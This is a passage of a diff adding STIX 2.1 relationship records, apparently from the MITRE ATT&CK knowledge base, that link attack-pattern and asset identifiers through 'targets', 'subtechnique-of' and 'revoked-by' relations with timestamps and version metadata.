"relationship--69f4ed24-c2f7-49e1-99a2-350cc2795820", + "created": "2023-09-29T17:44:19.135Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:44:19.135Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--69f912fa-af10-44b5-ad84-02a00f9c715e", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a033cdf-e2f1-477e-ad90-474637d84161", + "created": "2024-06-26T13:43:17.688Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:43:17.688Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a03c871-d6af-43cc-bd9d-7813297f0665", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a1d7178-8bad-42cc-81dd-cd74d949cede", + "created": "2020-02-20T21:01:25.557Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a2d3362-53f6-455b-bc1f-be9b85706a47", + "created": "2024-03-29T18:07:05.497Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-29T18:07:05.497Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--3a32740a-11b0-4bcf-b0a9-3abd0f6d3cd5", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a387a6a-2359-4ea6-ab73-9428e188d408", + "created": "2020-01-30T17:03:43.478Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926", + "target_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a476f56-2c07-43be-8054-d978ee8eb924", + "created": "2023-09-29T16:42:12.160Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:42:12.160Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a47e479-6f49-49e3-9a8f-3b6d0d1b510e", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a495e54-f0de-4405-a208-eacb2789a59e", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a56833a-c7c7-473d-b876-eee2f30f94f8", + "created": "2024-06-26T11:54:30.461Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T11:54:30.461Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a59c29b-98b7-46b5-b9a8-1d12c122d337", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a5aa548-d8c6-4246-b576-c459bf07414b", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a62c7b5-8917-4d0b-9092-1f0c003c0537", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a79ea40-9429-4047-bc2a-4fbc37c62fcb", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a871af8-80c7-45e0-8940-a6a819dc77d1", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6a9005ee-fc63-49f0-b3db-141acd36b478", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6ac12eaa-5989-410c-841e-6db3709dd71a", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6ac1f40a-5fae-4d51-b357-0f57eec77a96", + "created": "2020-02-05T20:13:52.283Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--101c3a64-9ba5-46c9-b573-5c501053cbca", + "target_ref": "attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6ac6fed0-e10d-438f-b93a-c18180da6c7f", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6ad2322f-3524-4e1a-b8e7-2995fd02a612", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6ad3b5cc-7ba1-4287-8c05-d02385f84f72", + "created": "2023-09-29T16:31:22.789Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:31:22.789Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6ada9ca3-c545-4ea9-95c1-8c8f817d8b42", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6af20f6a-e590-4031-a272-669e5ab1c3db", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6b08a5f9-ad93-40e3-b000-20a0cb9a81b4", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6b190029-01b8-4295-acd1-0cde13b854b6", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6b1e5db6-84e1-45d9-bc8d-bb987b208e44", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6b28ae81-1c3b-4f27-95a0-334cad9f4db0", + "created": "2024-06-24T18:56:46.125Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-24T18:56:46.125Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6b42093c-b235-4917-8d75-9cb2370d8ef3", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6b46c35d-aa25-430c-89a2-d8f512478122", + "created": "2020-03-12T19:29:21.104Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", + "target_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6b4dedc9-76b5-4044-a072-ac01717eb2f3", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6b50cc7f-4284-4b29-bb70-e4184dd52691", + "created": "2020-03-27T21:12:27.996Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6b54f354-9059-4366-8077-87360c4db2ab", + "created": "2023-10-02T20:18:20.019Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:18:20.019Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6b7c9b78-5b5f-4766-a3d2-2f78abf073da", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6b7cd974-07dd-41b2-a40a-5410918a6e17", + "created": "2020-02-21T21:08:36.670Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe", + "target_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6b80dff5-43ea-4d9b-b400-bb06a6c4ebf8", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6b9361fc-6a9e-4fc3-bc53-72a3f616869a", + "created": "2020-03-15T15:34:30.943Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", + "target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6ba340ee-93bf-462f-9387-44bf7436e438", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6bae365a-4424-4365-a441-dff2b7993250", + "created": "2020-02-18T18:22:41.699Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + 